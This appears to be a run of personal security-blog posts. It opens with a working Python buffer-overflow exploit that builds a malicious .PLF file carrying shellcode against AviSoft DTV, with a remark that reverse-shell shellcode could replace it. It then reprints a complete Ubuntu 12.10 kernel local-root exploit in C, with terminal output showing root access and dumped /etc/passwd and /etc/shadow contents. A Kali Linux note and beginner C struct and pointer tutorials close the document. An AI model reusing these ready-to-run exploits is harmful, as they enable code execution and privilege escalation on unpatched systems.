"xa9x31x6dxbbxe3xbax5cx83xa8x84x51x0exb0xc1x55"
"xf1xc7x39xa6x8cxdfxf9xd5x4ax55x1cx7dx18xcdxc4"
"x7cxcdx88x8fx72xbaxdfxc8x96x3dx33x63xa2xb6xb2"
"xa4x23x8cx90x60x68x56xb8x31xd4x39xc5x22xb0xe6"
"x63x28x52xf2x12x73x38x05x96x09x05x05xa8x11x25"
"x6ex99x9axaaxe9x26x49x8fx06x6dxd0xb9x8ex28x80"
"xf8xd2xcax7ex3exebx48x8bxbex08x50xfexbbx55xd6"
"x12xb1xc6xb3x14x66xe6x91x76xe9x74x79x79";

Well, Let’s modify the script again,change the shellcode. The Final reliable working exploit is:

print "Creating expoit."
f=open("crash-me.PLF","w") #Create the file

push="x90"*260 #Found by mona.py
eip ="xabxa7x11x64" #EIP
junk="x90"*500 #500 nops before real shellcode

#msfpayload windows/exec cmd=calc R |msfencode -b "x00xffx0ax0dx1axff" -t c
shellcode=("xdaxdbxd9x74x24xf4x5bx31xc9xb1x32xb8x6exb9xe3"
"x05x31x43x17x83xc3x04x03x2dxaax01xf0x4dx24x4c"
"xfbxadxb5x2fx75x48x84x7dxe1x19xb5xb1x61x4fx36"
"x39x27x7bxcdx4fxe0x8cx66xe5xd6xa3x77xcbxd6x6f"
"xbbx4dxabx6dxe8xadx92xbexfdxacxd3xa2x0exfcx8c"
"xa9xbdx11xb8xefx7dx13x6ex64x3dx6bx0bxbaxcaxc1"
"x12xeax63x5dx5cx12x0fx39x7dx23xdcx59x41x6ax69"
"xa9x31x6dxbbxe3xbax5cx83xa8x84x51x0exb0xc1x55"
"xf1xc7x39xa6x8cxdfxf9xd5x4ax55x1cx7dx18xcdxc4"
"x7cxcdx88x8fx72xbaxdfxc8x96x3dx33x63xa2xb6xb2"
"xa4x23x8cx90x60x68x56xb8x31xd4x39xc5x22xb0xe6"
"x63x28x52xf2x12x73x38x05x96x09x05x05xa8x11x25"
"x6ex99x9axaaxe9x26x49x8fx06x6dxd0xb9x8ex28x80"
"xf8xd2xcax7ex3exebx48x8bxbex08x50xfexbbx55xd6"
"x12xb1xc6xb3x14x66xe6x91x76xe9x74x79x79")
shellcode+="x90"*900 #Okay, Need enough junk , so nops instead "A"

all=push+eip+junk+shellcode

try:
f.write(all)
f.close()
print "File created"
except:
print "File cannot be created"

After regenerating the “crash-me.PLF” open in AviSoft DTV and it will execute calc.exe. I did it in debugger with pressing F9:

Anytime We can change the windows/exec shellcode to reverse shellcode which will connect to my specified IP address with command shell. 

The same exploit will work on windows 7 too :

Because i used EIP address from the application itself. If i would use the EIP from OS dll then of course the exploit won’t work(The advantage of application’s dll).

This is it!

Note: Exploit writing is much more about research. Without researching it is not possible to be an exploit writer . If you have questions,advices, please comment here or mail me and i will try to answer(Love to discuss!).
If you want to learn more about exploit development(In details) , read corelan’s tutorial https://www.corelan.be/index.php/category/security/exploit-writing-tutorials/.Much better than other commercial training :).

Backtrack reborn as Kali – downloaded Kali Linux

The site moved to root domain where all post are imported. Please go to http://pusheax.com/

BackTrack Reborn as Kali Linux. Yesterday i have downloaded Kali Linux from http://www.kali.org/downloads/ which has gnome as default DE (Classic mode) . Most penetration testers knows about Backtrack Linux which was Ubuntu based. Now it is based on Debian which is big advantage of it. This is more nice that They made it more simpler and looks beautiful.

It seems they did not included much new tools , maybe they excluded some tools from the Kali Linux. There is also not any directory called /penetesting .

All tools are installed in /usr/bin and /usr/local/sbin . Peoples now need to search the tools using locate,whereis etc if they don’t know the name of tools. Truthfully, Kali(Backtrack Linux) now bit hard for newbie and Newbie should not try this pentesting distribution. But believe me, It is now enough good .

Note: using tools is not skid. Everybody uses tools. Operating system itself is a tool. They are skid who are doing the thing without knowing anything. You are good to go with new Kali linux if you are good in Linux(Debian).

Kali: http://www.kali.org/downloads/

Ubuntu 12.10 Local Root Exploit

The site moved to root domain where all post are imported. Please go to http://pusheax.com/

Everybody know Ubuntu is a popular Linux distro(Basically for newbie). Today i was visiting exploitdb and found the Ubuntu 12.10 Local root exploit which worked only on 64bit.

I have tested the code since i had Ubuntu 12.10 installed on my vm already.

Code:

#include <unistd.h>
#include <sys/socket.h>
#include <linux/netlink.h>
#include <netinet/tcp.h>
#include <errno.h>
#include <linux/if.h>
#include <linux/filter.h>
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <linux/sock_diag.h>
#include <linux/inet_diag.h>
#include <linux/unix_diag.h>
#include <sys/mman.h>

typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
_commit_creds commit_creds;
_prepare_kernel_cred prepare_kernel_cred;
unsigned long sock_diag_handlers, nl_table;

int __attribute__((regparm(3)))
x()
{
commit_creds(prepare_kernel_cred(0));
return -1;
}

char stage1[] = "xffx25x00x00x00x00x00x00x00x00x00x00x00";

int main() {
int fd;
unsigned long mmap_start, mmap_size = 0x10000;
unsigned family;
struct {
struct nlmsghdr nlh;
struct unix_diag_req r;
} req;
char buf[8192];

if ((fd = socket(AF_NETLINK, SOCK_RAW, NETLINK_SOCK_DIAG)) < 0){
printf("Can't create sock diag socketn");
return -1;
}

memset(&req, 0, sizeof(req));
req.nlh.nlmsg_len = sizeof(req);
req.nlh.nlmsg_type = SOCK_DIAG_BY_FAMILY;
req.nlh.nlmsg_flags = NLM_F_ROOT|NLM_F_MATCH|NLM_F_REQUEST;
req.nlh.nlmsg_seq = 123456;

req.r.udiag_states = -1;
req.r.udiag_show = UDIAG_SHOW_NAME | UDIAG_SHOW_PEER | UDIAG_SHOW_RQLEN;

/* Ubuntu 12.10 x86_64 */
req.r.sdiag_family = 0x37;
commit_creds = (_commit_creds) 0xffffffff8107d180;
prepare_kernel_cred = (_prepare_kernel_cred) 0xffffffff8107d410;
mmap_start = 0x1a000;

if (mmap((void*)mmap_start, mmap_size, PROT_READ|PROT_WRITE|PROT_EXEC,
MAP_SHARED|MAP_FIXED|MAP_ANONYMOUS, -1, 0) == MAP_FAILED) {

printf("mmap faultn");
exit(1);
}

*(unsigned long *)&stage1[sizeof(stage1)-sizeof(&x)] = (unsigned long)x;
memset((void *)mmap_start, 0x90, mmap_size);
memcpy((void *)mmap_start+mmap_size-sizeof(stage1), stage1, sizeof(stage1));

send(fd, &req, sizeof(req), 0);
if(!getuid())
system("/bin/sh");
}

test@weird:~/Documents$ gcc -o ubu *
test@weird:~/Documents$ ls
test.c ubu
test@weird:~/Documents$ ./ubu
# whoami
root

# cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:105::/var/run/dbus:/bin/false
avahi-autoipd:x:103:106:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
usbmux:x:104:46:usbmux daemon,,,:/home/usbmux:/bin/false
whoopsie:x:105:110::/nonexistent:/bin/false
kernoops:x:106:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
rtkit:x:107:114:RealtimeKit,,,:/proc:/bin/false
colord:x:109:117:colord colour management daemon,,,:/var/lib/colord:/bin/false
lightdm:x:110:118:Light Display Manager:/var/lib/lightdm:/bin/false
avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
hplip:x:112:7:HPLIP system user,,,:/var/run/hplip:/bin/false
pulse:x:113:121:PulseAudio daemon,,,:/var/run/pulse:/bin/false
saned:x:114:123::/home/saned:/bin/false
kdm:x:115:65534::/home/kdm:/bin/false
test:x:1000:1000:test,,,:/home/test:/bin/bash
 # cat /etc/shadow
 root:!:15651:0:99999:7:::
daemon:*:15630:0:99999:7:::
bin:*:15630:0:99999:7:::
sys:*:15630:0:99999:7:::
sync:*:15630:0:99999:7:::
games:*:15630:0:99999:7:::
man:*:15630:0:99999:7:::
lp:*:15630:0:99999:7:::
mail:*:15630:0:99999:7:::
news:*:15630:0:99999:7:::
uucp:*:15630:0:99999:7:::
proxy:*:15630:0:99999:7:::
www-data:*:15630:0:99999:7:::
backup:*:15630:0:99999:7:::
list:*:15630:0:99999:7:::
irc:*:15630:0:99999:7:::
gnats:*:15630:0:99999:7:::
nobody:*:15630:0:99999:7:::
libuuid:!:15630:0:99999:7:::
syslog:*:15630:0:99999:7:::
messagebus:*:15630:0:99999:7:::
avahi-autoipd:*:15630:0:99999:7:::
usbmux:*:15630:0:99999:7:::
whoopsie:*:15630:0:99999:7:::
kernoops:*:15630:0:99999:7:::
rtkit:*:15630:0:99999:7:::
colord:*:15630:0:99999:7:::
lightdm:*:15630:0:99999:7:::
avahi:*:15630:0:99999:7:::
hplip:*:15630:0:99999:7:::
pulse:*:15630:0:99999:7:::
saned:*:15630:0:99999:7:::
kdm:*:15650:0:99999:7:::
test:$6$aoMcNoTU$IR6Ug3SthKdI4.ixdwf9rsIRsdz.4OACiabhaoxdd0NoYbjvxa9I.dj7VF7U4OaB7Oy2gDezCXL/oQx9riRXP0:15651:0:99999:7:::


This is really great !

Source: http://www.exploit-db.com/exploits/24746/

struct,typedef,array and pointer [all togther?]

The site moved to root domain where all post are imported. Please go to http://pusheax.com/

This post is part of http://www.pusheax.com/2013/03/struct-and-typedef-of-c-programming.html . Such as struct, pointer, typedef example. I have did some more advanced things with struct:

#include <stdio.h>
#include <string.h>

int main()

{
//Yes We can declar a whole sentence in variable(Remember *):
char *str="We need to know programming for being a security resarcher.";




int *ptr; //We declaring c pointer which start with asteric!
int anotherN; // This int variable
anotherN=1337; //The current value of the declared variable.
int what; //A blank variable has been declared.




ptr=&anotherN; //This is the pointer trick. ptr now pointing to address of anotherN
what=*ptr; /*Now what=address_of_anotherN, and anotherN_address=1337. So what=1337.
            Whenever we are going to change the value of a variable using a pointer
            remember that we need the asteric. First we need "&" as reference address.
            then we need the asteric for getting final declaration and the value. */




*ptr=420; /* Remember that anotherN's value was 1337 ? But now it is 420. So we really
            can change the value anything by declaring new value. Remember that it will
            only change the value of the reference address. So in our case it "anotherN" */




printf("nnn%sn",str); //Print the value of "str"
printf("Value of what: %dn",what);
printf("Value of anotherN: %dn",anotherN);

//Time to go in advanced!




typedef struct pusheax

{
int push;
char add[20]; //It is not a problem using array.
}pUsheax; //The masked name



pUsheax instanc; //Getting instance name of the struct.
pUsheax *mypusheax; //Declaring "pusheax" type pointer. Yes we can have pointer in struct.

mypusheax=&instanc; //Pointing to instanc
instanc.push=100; //push=100




//Print the value of "push":
printf("The current value of "push" is: %dn",instanc.push);



mypusheax->push=200; /* Here is tricky? Now we are not changing the value using asteric.
                here we are using dash and "greater than" operator to redirect to
                declard variable. Data actually going mypusheax and mypusheax
                transfering the data to "push". So it shopisticately chage the value.*/



printf("Now "push"= %dnnn",instanc.push);

strcpy(mypusheax->add,"www.pusheax.com"); /*store the string pusheax.com in "add" array.
                            strcpy is evil. It causes the buffer overflow
                            if the "add" array gets fill with more than 20
                            value then stack will get overwriten. Because
                            strcpy does not check boundary. More secure function
                            is strncpy() :)*/


printf("ttttt%sn",instanc.add); //We print the current value of add[20] declared array.
printf("ttttt---------------n");
printf("ttttt%snnn",mypusheax->add); /* We also can get the value of add[] instead calling
                            calling instanc.add */



}

Compile and Run:

push@pusheax:~/code$ gcc strucptr.c -o strucptr
push@pusheax:~/code$ ./strucptr



We need to know programming for being a security resarcher.
Value of what: 1337
Value of anotherN: 420
The current value of "push" is: 100
Now "push"= 200


www.pusheax.com
---------------
www.pusheax.com


push@pusheax:~/code$

struct and typedef of C programming lanugage

The site moved to root domain where all post are imported. Please go to http://pusheax.com/

C is really powerful system programming language. I believe most of experienced hacker,penetration tester,exploit developer has knowledge of C Language(At least basic). I am not professional or regular experienced programmer. I do coding when i feel of shortness :). Coding is really fun if we can compile without any error… no? I was been keeping forgetting the C structure syntax, The struct and typedef. So i quickly wrote this blog post with the complete code in case it is useful for someone πŸ™‚ . Just see the C comments for explanation of each line.  

#include <stdio.h>

int main()
{

struct pusheax /* struct is collection of variable. Declaring the name of the struct
                        which working like defining TYPE which is also called tag. So here
                        tag is "pusheax". we can call it "Name of struct" */

{
int number; //Variable under parent variable.
int number1; // Declaring another variable.
};



struct pusheax hacker; /* Here "hacker" is instance of "garbage" tag.
                    We must need it for calling variable properly. */



hacker.number=1337; /* now the value of the variable can be set like
                    "hacker.number". <instance.number=value> */
hacker.number1=31337;


//Same as normal printf function. But here we must need to add dot struct instance otherwise won't work:
printf("hacker.number is : %dn",hacker.number);
printf("hacker.number1 is: %dn",hacker.number1); //Same as previous.




struct ini //Another struct.

{
char *str; //It is going to be string pointer, Because the value won't be only "H" :).
int number; //Another variable.
};



struct ini string={0,0}; // We can also initialize the variable!



string.str="Hackers"; //The value of declared varible above under the struct "ini"
string.number=1337; //Another C variable




printf("Char is = %s & number is = %dn",string.str,string.number); /* Notice that we can delar
                        same variable without any class or function */

//Let use typedef keyword too.



typedef struct puSheax // new? It is structure definition. PuSeax is the name[tag].
//We can use it same as above structure

{
char *know; //C char variable
int knowing; // Another C Integer variable

}p00seax; // The alias name. This is what we are using typedef for.



p00seax p0sheax; //How fun? Now we declared another variable using the alias . Mask?
p0sheax.know="Knowledge is power!"; /*again we need to set the value. So it is completely related
                        with puSheax struct */

p0sheax.knowing=301337; // Same as above



printf("Value of "know": "%s" and value of "knowing" is : "%d"n",
p0sheax.know,p0sheax.knowing); // Perhaps nothing to explain here.


printf("nnnttpusheax.com is for independent ethical hacking,
        penetration testing,programming practice!!! πŸ™‚nnnt"); 
    puts(" Next: http://www.pusheax.com/2013/03/structtypedefarray-and-pointer-all.htmln");
 return 0;        //No error , just exit normally!

//compile: gcc struc.c -o struc
//run: ./struc
}

push@pusheax:~/code$ gcc struc.c -o struc;./struc
hacker.number is : 1337
hacker.number1 is: 31337
Char is = Hackers & number is = 1337
Value of "know": "Knowledge is power!" and value of "knowing" is : "301337"



pusheax.com is for independent ethical hacking,penetration testing,programming practice!!!:)
Next: http://www.pusheax.com/2013/03/structtypedefarray-and-pointer-all.html 

 simple?

If you have any questions please let’s discuss :).